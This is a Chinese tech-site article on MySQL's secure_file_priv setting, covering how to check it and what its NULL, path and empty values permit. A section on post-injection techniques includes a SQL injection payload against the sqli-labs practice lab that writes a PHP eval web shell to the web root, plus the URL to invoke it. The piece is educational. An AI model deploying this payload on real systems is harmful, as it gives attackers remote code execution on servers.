Mysql 中的secure_file_priv參數(shù)設置方法
secure_file_priv是MySQL中的系統(tǒng)變量,用于限制文件的讀取和寫入。
該參數(shù)的設置可以通過my.ini(windows版本)/my.cnf(Linux版本)中設置。
修改完參數(shù)之后,必須重啟數(shù)據(jù)庫才能生效。
啟動MySQL,先查看secure_file_priv的值。
命令:show variables like "secure%" 或 select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的讀取和寫入。
2.secure_file_priv = 文件路徑 ,限制文件的讀取和寫入只能在設定的文件夾中。
3.secure_file_priv= "", 對文件和讀取和寫入沒有任何限制。
【MySQL漏洞注入后期】
1. select *** into dumpfile 文件路徑;
內(nèi)容在文件中是以一行的形式呈現(xiàn),多行數(shù)據(jù)會出現(xiàn)數(shù)據(jù)保存不全;
dumpfile只能寫一行,并且輸出中不存在任何格式。
2.select *** into outfile 文件路徑;
內(nèi)容有特殊格式轉(zhuǎn)換,該換行換行,較比dumpfile更加好用;
outfile可以寫入多行數(shù)據(jù),并且字段和行終止符都可以作為格式輸出。
例如:?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +
調(diào)用:url/test.php?123=phpinfo();
3.select *** load_file (下載文件)
select load_file(文件路徑);
到此這篇關(guān)于Mysql 中的secure_file_priv參數(shù)設置的文章就介紹到這了,更多相關(guān)mysql secure_file_priv參數(shù)設置內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
Windows?Server?2019部署MySQL?8完整步驟教程
MySQL在開發(fā)開源軟件時經(jīng)常被當作該軟件的數(shù)據(jù)管理系統(tǒng),所以我們在開發(fā)時將會經(jīng)常用到它,所以如何安裝MySQL就是一個問題了,這篇文章主要介紹了Windows Server 2019部署MySQL 8的相關(guān)資料,需要的朋友可以參考下2026-04-04
MySQL 多列 IN 查詢之語法、性能與實戰(zhàn)技巧(最新整理)
本文詳解MySQL多列IN查詢,對比傳統(tǒng)OR寫法,強調(diào)其簡潔高效,適合批量匹配復合鍵,通過聯(lián)合索引、分批次優(yōu)化提升性能,兼容多種數(shù)據(jù)庫,提供動態(tài)生成和實戰(zhàn)技巧,助力復雜條件查詢優(yōu)化,感興趣的朋友一起看看吧2025-07-07
Linux遠程部署MySQL數(shù)據(jù)庫詳細步驟
這篇文章主要介紹了Linux遠程部署MySQL數(shù)據(jù)庫的詳細步驟,文中步驟介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們可以參考一下2019-11-11
mysql利用mysqlbinlog命令恢復誤刪除數(shù)據(jù)的實現(xiàn)
這篇文章主要介紹了mysql利用mysqlbinlog命令恢復誤刪除數(shù)據(jù)的實現(xiàn),文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧2021-03-03

